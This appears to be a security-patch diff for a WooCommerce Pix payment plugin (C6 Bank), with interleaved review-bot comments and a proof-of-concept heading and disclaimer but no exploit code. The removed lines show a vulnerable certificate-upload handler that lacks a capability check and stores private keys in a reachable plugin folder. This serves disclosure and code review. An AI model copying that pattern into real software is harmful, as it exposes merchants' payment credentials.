+ 'input_description' => esc_attr__('Set the title for Pix payment on checkout.', 'lkn-payment-pix-for-woocommerce'),
),
'description' => array(
- 'title' => esc_attr__('Description', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Description', 'lkn-payment-pix-for-woocommerce'),
'type' => 'textarea',
- 'description' => esc_attr__('Enter the description that will be shown to the user during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'default' => esc_attr__('Pay for your purchase with Pix using C6 Bank.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter the description that will be shown to the user during checkout.', 'lkn-payment-pix-for-woocommerce'),
+ 'default' => esc_attr__('Pay for your purchase with Pix using C6 Bank.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
- 'block_title' => esc_attr__('Checkout Description', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Shown to customers during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Description shown to customers during checkout.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Checkout Description', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Shown to customers during checkout.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Description shown to customers during checkout.', 'lkn-payment-pix-for-woocommerce'),
),
'environment' => array(
- 'title' => esc_attr__('Environment', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Environment', 'lkn-payment-pix-for-woocommerce'),
'type' => 'select',
- 'description' => esc_attr__('Select the environment for Pix integration.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Select the environment for Pix integration.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => 'production',
'options' => array(
- 'sandbox' => esc_attr__('Sandbox', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'production' => esc_attr__('Production', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'sandbox' => esc_attr__('Sandbox', 'lkn-payment-pix-for-woocommerce'),
+ 'production' => esc_attr__('Production', 'lkn-payment-pix-for-woocommerce'),
),
- 'block_title' => esc_attr__('Environment', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Choose between test or production environment.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Select the environment for Pix API requests.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Environment', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Choose between test or production environment.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Select the environment for Pix API requests.', 'lkn-payment-pix-for-woocommerce'),
),
'pix_key' => array(
- 'title' => esc_attr__('Credentials', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Credentials', 'lkn-payment-pix-for-woocommerce'),
'type' => 'text',
'custom_attributes' => array(
'required' => 'required'
),
- 'description' => esc_attr__('Enter your credentials.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter your credentials.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
- 'block_title' => esc_attr__('Pix Key', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Your registered Pix key at C6 Bank.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Your Pix key registered at C6 Bank.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Pix Key', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Your registered Pix key at C6 Bank.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Your Pix key registered at C6 Bank.', 'lkn-payment-pix-for-woocommerce'),
),
'client_id' => array(
- 'title' => esc_attr__('C6 Client ID', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('C6 Client ID', 'lkn-payment-pix-for-woocommerce'),
'type' => 'password',
'custom_attributes' => array(
'required' => 'required'
),
- 'description' => esc_attr__('Enter your C6 Client ID.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter your C6 Client ID.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
- 'block_title' => esc_attr__('Client ID', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Provided by C6 Bank for API access.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Your C6 Bank Client ID.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Client ID', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Provided by C6 Bank for API access.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Your C6 Bank Client ID.', 'lkn-payment-pix-for-woocommerce'),
'join' => 'pix_key'
),
'client_secret' => array(
- 'title' => esc_attr__('C6 Client Secret', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('C6 Client Secret', 'lkn-payment-pix-for-woocommerce'),
'type' => 'password',
'custom_attributes' => array(
'required' => 'required'
),
- 'description' => esc_attr__('Enter your C6 Client Secret.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enter your C6 Client Secret.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
- 'block_title' => esc_attr__('Client Secret', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Provided by C6 Bank for API access.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Your C6 Bank Client Secret.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Client Secret', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Provided by C6 Bank for API access.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Your C6 Bank Client Secret.', 'lkn-payment-pix-for-woocommerce'),
'join' => 'pix_key'
),
'certificate_crt_path' => array(
- 'title' => esc_attr__('Certificates', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Certificates', 'lkn-payment-pix-for-woocommerce'),
'type' => 'file',
- 'description' => esc_attr__('Upload your .crt and .key certificates files.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Upload your .crt and .key certificates files.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
- 'block_title' => esc_attr__('Certificate .crt', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Required for secure Pix transactions.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Upload the .crt certificate file for secure Pix transactions.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Certificate .crt', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Required for secure Pix transactions.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Upload the .crt certificate file for secure Pix transactions.', 'lkn-payment-pix-for-woocommerce'),
),
'certificate_key_path' => array(
- 'title' => esc_attr__('Certificate .key File', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Certificate .key File', 'lkn-payment-pix-for-woocommerce'),
'type' => 'file',
- 'description' => esc_attr__('Upload your .key certificate file.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Upload your .key certificate file.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => '',
- 'block_title' => esc_attr__('Certificate .key', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Required for secure Pix transactions.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Upload the .key certificate file for secure Pix transactions.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Certificate .key', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Required for secure Pix transactions.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Upload the .key certificate file for secure Pix transactions.', 'lkn-payment-pix-for-woocommerce'),
'join' => 'certificate_crt_path'
),
'additional_resources' => array(
- 'title' => esc_attr__('Additional Resources', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Additional Resources', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'pix_expiration_minutes' => array(
- 'title' => esc_attr__('Expiration option', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Expiration option', 'lkn-payment-pix-for-woocommerce'),
'type' => 'number',
- 'description' => esc_attr__('Set the expiration time for Pix payment.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Set the expiration time for Pix payment.', 'lkn-payment-pix-for-woocommerce'),
'default' => 1440, // 24 horas em minutos
'desc_tip' => true,
'custom_attributes' => array(
'min' => 1
),
- 'block_title' => esc_attr__('Pix Expiration Time (minutes)', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Set how long Pix payment is valid.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Expiration time for Pix payment in minutes. For example, 1440 minutes is equivalent to 1 day (24 hours). Adjust this value according to your business needs.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Pix Expiration Time (minutes)', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Set how long Pix payment is valid.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Expiration time for Pix payment in minutes. For example, 1440 minutes is equivalent to 1 day (24 hours). Adjust this value according to your business needs.', 'lkn-payment-pix-for-woocommerce'),
),
'generate_pix_after_expiration' => array(
- 'title' => esc_attr__('Generate Pix After Expiration', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Generate Pix After Expiration', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => esc_attr__('Enable to generate a new Pix payment when the order status changes from cancelled or failed back to pending.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'description' => esc_attr__('Enable this option to automatically generate a new Pix payment if the order returns to pending after being cancelled or failed.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => esc_attr__('Enable to generate a new Pix payment when the order status changes from cancelled or failed back to pending.', 'lkn-payment-pix-for-woocommerce'),
+ 'description' => esc_attr__('Enable this option to automatically generate a new Pix payment if the order returns to pending after being cancelled or failed.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => 'no',
- 'block_title' => esc_attr__('Generate Pix After Expiration', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Automatically generate Pix for returned orders.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Generate a new Pix payment if the order returns to pending.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Generate Pix After Expiration', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Automatically generate Pix for returned orders.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Generate a new Pix payment if the order returns to pending.', 'lkn-payment-pix-for-woocommerce'),
'join' => 'pix_expiration_minutes',
),
'generate_pix_button' => array(
- 'title' => esc_attr__('Enable Pix Button on Checkout', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Enable Pix Button on Checkout', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => esc_attr__('Show Pix payment button during checkout', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'description' => esc_attr__('Enable this option to display the Pix payment button on the checkout page for customers.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => esc_attr__('Show Pix payment button during checkout', 'lkn-payment-pix-for-woocommerce'),
+ 'description' => esc_attr__('Enable this option to display the Pix payment button on the checkout page for customers.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
'default' => 'yes',
- 'block_title' => esc_attr__('Pix Button on Checkout', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Show Pix payment button for customers.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Show Pix payment button on the checkout page.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Pix Button on Checkout', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Show Pix payment button for customers.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Show Pix payment button on the checkout page.', 'lkn-payment-pix-for-woocommerce'),
),
'hidde_paid_pix' => array(
- 'title' => esc_attr__('Hide Pix after payment', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'label' => esc_attr__('Hide Pix QRCode for logged in customers with processing or completed order', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Hide Pix after payment', 'lkn-payment-pix-for-woocommerce'),
+ 'label' => esc_attr__('Hide Pix QRCode for logged in customers with processing or completed order', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
'desc_tip' => true,
- 'description' => esc_attr__('Enable this option to hide the Pix QR Code in my customer account that is processing or completed.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'description' => esc_attr__('Enable this option to hide the Pix QR Code in my customer account that is processing or completed.', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no',
- 'block_title' => esc_attr__('Hide Pix QRCode', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Hide Pix QRCode for completed or processing orders.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Hide Pix QRCode for customers with completed or processing orders.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Hide Pix QRCode', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Hide Pix QRCode for completed or processing orders.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Hide Pix QRCode for customers with completed or processing orders.', 'lkn-payment-pix-for-woocommerce'),
),
'developer' => array(
- 'title' => esc_attr__('Developer', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Developer', 'lkn-payment-pix-for-woocommerce'),
'type' => 'title',
),
'debug' => array(
- 'title' => esc_attr__('Debug', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Debug', 'lkn-payment-pix-for-woocommerce'),
'type' => 'checkbox',
- 'label' => esc_attr__('Enable debug logs.', 'gateway-de-pagamento-pix-para-woocommerce') . ' ' . wp_kses_post('<a href="' . esc_url(admin_url('admin.php?page=wc-status&tab=logs')) . '" target="_blank">' . __('See logs', 'gateway-de-pagamento-pix-para-woocommerce') . '</a>'),
- 'description' => esc_attr__('Enable this option to log Pix payment events for troubleshooting.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => esc_attr__('Enable debug logs.', 'lkn-payment-pix-for-woocommerce') . ' ' . wp_kses_post('<a href="' . esc_url(admin_url('admin.php?page=wc-status&tab=logs')) . '" target="_blank">' . __('See logs', 'lkn-payment-pix-for-woocommerce') . '</a>'),
+ 'description' => esc_attr__('Enable this option to log Pix payment events for troubleshooting.', 'lkn-payment-pix-for-woocommerce'),
'default' => 'no',
- 'block_title' => esc_attr__('Debug Mode', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Enable debug logs for troubleshooting.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Enable debug logs for troubleshooting.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Debug Mode', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Enable debug logs for troubleshooting.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Enable debug logs for troubleshooting.', 'lkn-payment-pix-for-woocommerce'),
),
'test_integration' => array(
- 'title' => esc_attr__('Test Integration', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'title' => esc_attr__('Test Integration', 'lkn-payment-pix-for-woocommerce'),
'type' => 'button',
- 'label' => esc_attr__('Test Integration', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'description' => esc_attr__('Click to test the integration after saving your settings.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'label' => esc_attr__('Test Integration', 'lkn-payment-pix-for-woocommerce'),
+ 'description' => esc_attr__('Click to test the integration after saving your settings.', 'lkn-payment-pix-for-woocommerce'),
'desc_tip' => true,
- 'block_title' => esc_attr__('Test Integration', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'block_sub_title' => esc_attr__('Test your Pix integration after saving.', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'input_description' => esc_attr__('Test your Pix integration after saving.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'block_title' => esc_attr__('Test Integration', 'lkn-payment-pix-for-woocommerce'),
+ 'block_sub_title' => esc_attr__('Test your Pix integration after saving.', 'lkn-payment-pix-for-woocommerce'),
+ 'input_description' => esc_attr__('Test your Pix integration after saving.', 'lkn-payment-pix-for-woocommerce'),
),
);
}
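Review bot: Every changed line in this settings array is a text-domain rename from 'gateway-de-pagamento-pix-para-woocommerce' to 'lkn-payment-pix-for-woocommerce', which is unrelated to the upload fix and buries the security-relevant hunks; split it into its own commit. While touching these entries, note that the field keys certificate_crt_path and certificate_key_path keep the _path suffix although the patched handler stores certificate_crt_content and certificate_key_content, so either rename the fields or add a comment saying the keys are only form field names.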
@@ -398,9 +400,12 @@
$client_id = isset($settings['client_id']) ? $settings['client_id'] : '';
$client_secret = isset($settings['client_secret']) ? $settings['client_secret'] : '';
- // Get certificate paths
- $crt_path = !empty($settings['certificate_crt_path']) ? PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . $settings['certificate_crt_path'] : '';
- $key_path = !empty($settings['certificate_key_path']) ? PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . $settings['certificate_key_path'] : '';
+ // SECURITY: Get certificate data from encoded storage in database
+ $crt_content = !empty($settings['certificate_crt_content']) ? $settings['certificate_crt_content'] : '';
+ $key_content = !empty($settings['certificate_key_content']) ? $settings['certificate_key_content'] : '';
+
+ $crt_path = !empty($crt_content) ? $this->create_temp_certificate_file($crt_content, 'crt') : '';
+ $key_path = !empty($key_content) ? $this->create_temp_certificate_file($key_content, 'key') : '';
// Validations
if (empty($pix_key)) {
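Review bot: The two create_temp_certificate_file() calls run before the validation block that follows, so a request that fails a later check (missing Pix key, client ID or secret) has already written the private key to a temporary file. Move the calls below the validations and delete the temp files on every exit path, including the thrown exceptions, for example with a try/finally around the code that uses them.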
@@ -409,11 +414,11 @@
if (empty($client_id) || empty($client_secret)) {
throw new Exception('Client ID or Client Secret not configured.');
}
- if (empty($crt_path) || !file_exists($crt_path)) {
- throw new Exception('Certificate .crt file not found: ' . $crt_path);
+ if (empty($crt_content)) {
+ throw new Exception('Certificate .crt not configured or invalid.');
}
- if (empty($key_path) || !file_exists($key_path)) {
- throw new Exception('Certificate .key file not found: ' . $key_path);
+ if (empty($key_content)) {
+ throw new Exception('Certificate .key not configured or invalid.');
}
// Validate CPF/CNPJ
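Review bot: The new checks test only $crt_content and $key_content, so an empty $crt_path or $key_path returned by a failed create_temp_certificate_file() call is no longer caught here, and nothing verifies the "or invalid" part of the message. Check the returned paths as well, or confirm that the stored content decodes to a certificate and key before continuing. Dropping the filesystem path from the exception text is a good change and should stay.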
@@ -421,7 +426,7 @@
$cpfCnpjData = $this->validateCpfCnpjType($cpfCnpj);
if (!$cpfCnpjData['valid']) {
- throw new Exception(__('Please enter a valid CPF or CNPJ.', 'gateway-de-pagamento-pix-para-woocommerce'));
+ throw new Exception(__('Please enter a valid CPF or CNPJ.', 'lkn-payment-pix-for-woocommerce'));
}
$order->update_meta_data('_cpf_cnpj_type', $cpfCnpjData['type']);
@@ -438,8 +443,6 @@
// 1. Get Auth Token using static method
$auth_result = LknPaymentPixForWoocommercePixC6Endpoint::get_c6_auth_token(
- $crt_path,
- $key_path,
$client_id,
$client_secret,
$base_url
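Review bot: With $crt_path and $key_path removed from the get_c6_auth_token() call, nothing visible here consumes the temp files created in the earlier hunk. If the static method now loads the certificate itself, drop the create_temp_certificate_file() calls from this function; if a later request still needs the paths, say so in a comment and state which code deletes the files.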
@@ -654,24 +657,24 @@
$generate_after_exp = isset($settings['generate_pix_after_expiration']) ? $settings['generate_pix_after_expiration'] : 'no';
if ($generate_after_exp === 'yes') {
- $expiredPaymentMsg = __('Pix expired, please refresh the page to update the payment order.', 'gateway-de-pagamento-pix-para-woocommerce');
+ $expiredPaymentMsg = __('Pix expired, please refresh the page to update the payment order.', 'lkn-payment-pix-for-woocommerce');
} else {
- $expiredPaymentMsg = __('Pix expired, please generate a new order.', 'gateway-de-pagamento-pix-para-woocommerce');
+ $expiredPaymentMsg = __('Pix expired, please generate a new order.', 'lkn-payment-pix-for-woocommerce');
}
wp_localize_script(
'payment-pix-for-woo-pix-template',
'phpVarsPix',
array(
- 'nextVerify' => __('Next verification in (Number of attempts:', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'successPayment' => __('Payment confirmed!', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'pixButton' => __('I have already paid the PIX', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'copy' => __('COPY', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'copied' => __('COPIED!', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'shareTitle' => __('Share PIX code', 'gateway-de-pagamento-pix-para-woocommerce'),
- 'shareError' => __('Your browser does not support sharing.', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'nextVerify' => __('Next verification in (Number of attempts:', 'lkn-payment-pix-for-woocommerce'),
+ 'successPayment' => __('Payment confirmed!', 'lkn-payment-pix-for-woocommerce'),
+ 'pixButton' => __('I have already paid the PIX', 'lkn-payment-pix-for-woocommerce'),
+ 'copy' => __('COPY', 'lkn-payment-pix-for-woocommerce'),
+ 'copied' => __('COPIED!', 'lkn-payment-pix-for-woocommerce'),
+ 'shareTitle' => __('Share PIX code', 'lkn-payment-pix-for-woocommerce'),
+ 'shareError' => __('Your browser does not support sharing.', 'lkn-payment-pix-for-woocommerce'),
'expiredPayment' => $expiredPaymentMsg,
- 'expiredPaymentDate' => __('Pix expired at:', 'gateway-de-pagamento-pix-para-woocommerce'),
+ 'expiredPaymentDate' => __('Pix expired at:', 'lkn-payment-pix-for-woocommerce'),
'apiUrl' => $api_url,
)
);
@@ -682,6 +685,17 @@
$plugin_path = 'invoice-payment-for-woocommerce/wc-invoice-payment.php';
$invoice_plugin_installed = file_exists(WP_PLUGIN_DIR . '/' . $plugin_path);
+ // SECURITY: Generate nonces securely for admin scripts
+ wp_localize_script(
+ 'payment-pix-for-woo-admin-gateway-save-fields',
+ 'pixC6AdminNonces',
+ array(
+ 'save_settings' => wp_create_nonce('lkn_pix_for_woocommerce_c6_settings_nonce'),
+ 'test_integration' => wp_create_nonce('pixforwoo_test_c6_pix_charge'),
+ 'ajax_url' => admin_url('admin-ajax.php')
+ )
+ );
+
wc_get_template(
'pixForWoocommercePaymentAdminFields.php', // nome do template
array(
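Review bot: wp_localize_script() only attaches data to a handle that is already registered, so if 'payment-pix-for-woo-admin-gateway-save-fields' is registered after this call the pixC6AdminNonces object is silently missing and both AJAX actions fail their nonce check; confirm the ordering or check the return value. A short comment that these nonces are CSRF protection only, with authorization left to the capability check in the handler, would keep a later refactor from treating them as an access control.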
@@ -699,8 +713,16 @@
public function lkn_pix_for_woocommerce_c6_save_settings()
{
+ // SECURITY: Verify user capabilities before processing
+ if (!current_user_can('manage_woocommerce')) {
+ wp_send_json_error(['message' => 'Insufficient permissions.'], 403);
+ }
+
check_ajax_referer('lkn_pix_for_woocommerce_c6_settings_nonce');
+ // SECURITY: Validate file uploads first
+ $this->validate_certificate_uploads();
+
// The $_POST['settings'] value is sanitized right after decoding below.
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
$settings = isset($_POST['settings']) ? json_decode(wp_unslash($_POST['settings']), true) : [];
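Review bot: The return value of $this->validate_certificate_uploads() is discarded, so the method has to terminate the request itself on a bad file, and that contract is invisible at the call site. Have it return a boolean or WP_Error and call wp_send_json_error() here, or document that it exits. The capability check uses 'manage_woocommerce', which shop managers also hold; confirm that role is meant to replace payment certificates.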
@@ -719,66 +741,55 @@
$settings['pix_expiration_minutes'] = max(1, intval($settings['pix_expiration_minutes']));
}
- // Inicializa o WP_Filesystem
- global $wp_filesystem;
- if (empty($wp_filesystem)) {
- require_once(ABSPATH . '/wp-admin/includes/file.php');
- WP_Filesystem();
- }
-
- // Diretório dos certificados
- $base_dir = PAYMENT_PIX_FOR_WOOCOMMERCE_DIR . 'Includes/files/';
- $certs_dir = $base_dir . 'certs_c6/';
+ $has_crt = !empty(sanitize_text_field(wp_unslash($_FILES['certificate_crt_path']['name'] ?? '')));
+ $has_key = !empty(sanitize_text_field(wp_unslash($_FILES['certificate_key_path']['name'] ?? '')));
- if (!$wp_filesystem->is_dir($base_dir)) {
- $wp_filesystem->mkdir($base_dir, FS_CHMOD_DIR);
- }
- if (!$wp_filesystem->is_dir($certs_dir)) {
- $wp_filesystem->mkdir($certs_dir, FS_CHMOD_DIR);
- }
-
- $has_crt = !empty($_FILES['certificate_crt_path']['name']);
- $has_key = !empty($_FILES['certificate_key_path']['name']);
-
- if ($has_crt || $has_key) {
- $this->lkn_clear_cert_folder($certs_dir);
- }
-
- // Processa o upload do arquivo .crt
+ // Process .crt file upload and convert to encoded format
if ($has_crt) {
- $crt_filename = isset($_FILES['certificate_crt_path']['name']) ? sanitize_file_name($_FILES['certificate_crt_path']['name']) : '';
- $crt_target = $certs_dir . $crt_filename;
-
- $tmp_file = isset($_FILES['certificate_crt_path']['tmp_name']) ? sanitize_text_field($_FILES['certificate_crt_path']['tmp_name']) : '';
+ $crt_filename = isset($_FILES['certificate_crt_path']['name']) ? sanitize_file_name(wp_unslash($_FILES['certificate_crt_path']['name'])) : '';
+ $tmp_file = isset($_FILES['certificate_crt_path']['tmp_name']) ? sanitize_text_field(wp_unslash($_FILES['certificate_crt_path']['tmp_name'])) : '';
+
if (is_uploaded_file($tmp_file)) {
- $wp_filesystem->copy($tmp_file, $crt_target, true);
- $settings['certificate_crt_path'] = 'Includes/files/certs_c6/' . $crt_filename;
+ $file_content = file_get_contents($tmp_file);
+ if ($file_content !== false) {
+ $settings['certificate_crt_content'] = base64_encode($file_content);
+ $settings['certificate_crt_filename'] = $crt_filename;
+ } else {
+ wp_send_json_error(['message' => 'Failed to read .crt certificate file.']);
+ }
} else {
wp_send_json_error(['message' => 'Failed to upload .crt certificate file.']);
}
}
- // Processa o upload do arquivo .key
+ // Process .key file upload and convert to encoded format
if ($has_key) {
- $key_filename = isset($_FILES['certificate_key_path']['name']) ? sanitize_file_name($_FILES['certificate_key_path']['name']) : '';
- $key_target = $certs_dir . $key_filename;
-
- $tmp_file = isset($_FILES['certificate_key_path']['tmp_name']) ? sanitize_text_field($_FILES['certificate_key_path']['tmp_name']) : '';
+ $key_filename = isset($_FILES['certificate_key_path']['name']) ? sanitize_file_name(wp_unslash($_FILES['certificate_key_path']['name'])) : '';
+ $tmp_file = isset($_FILES['certificate_key_path']['tmp_name']) ? sanitize_text_field(wp_unslash($_FILES['certificate_key_path']['tmp_name'])) : '';
+
if (is_uploaded_file($tmp_file)) {
- $wp_filesystem->copy($tmp_file, $key_target, true);
- $settings['certificate_key_path'] = 'Includes/files/certs_c6/' . $key_filename;
+ $file_content = file_get_contents($tmp_file);
+ if ($file_content !== false) {
+ $settings['certificate_key_content'] = base64_encode($file_content);
+ $settings['certificate_key_filename'] = $key_filename;
+ } else {
+ wp_send_json_error(['me
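Review bot: Removing the certs_c6/ handling, including the lkn_clear_cert_folder() call, means nothing in the patched handler deletes what earlier versions wrote under Includes/files/certs_c6/, so files uploaded before the update stay on disk and stay reachable; add an upgrade routine that removes that directory. Separately, wp_unslash() on $_FILES[...]['tmp_name'] strips backslashes and will break is_uploaded_file() on Windows temp paths, so pass tmp_name through unchanged. The file_get_contents() calls also have no size limit before the content is base64-encoded into the settings option.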
Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
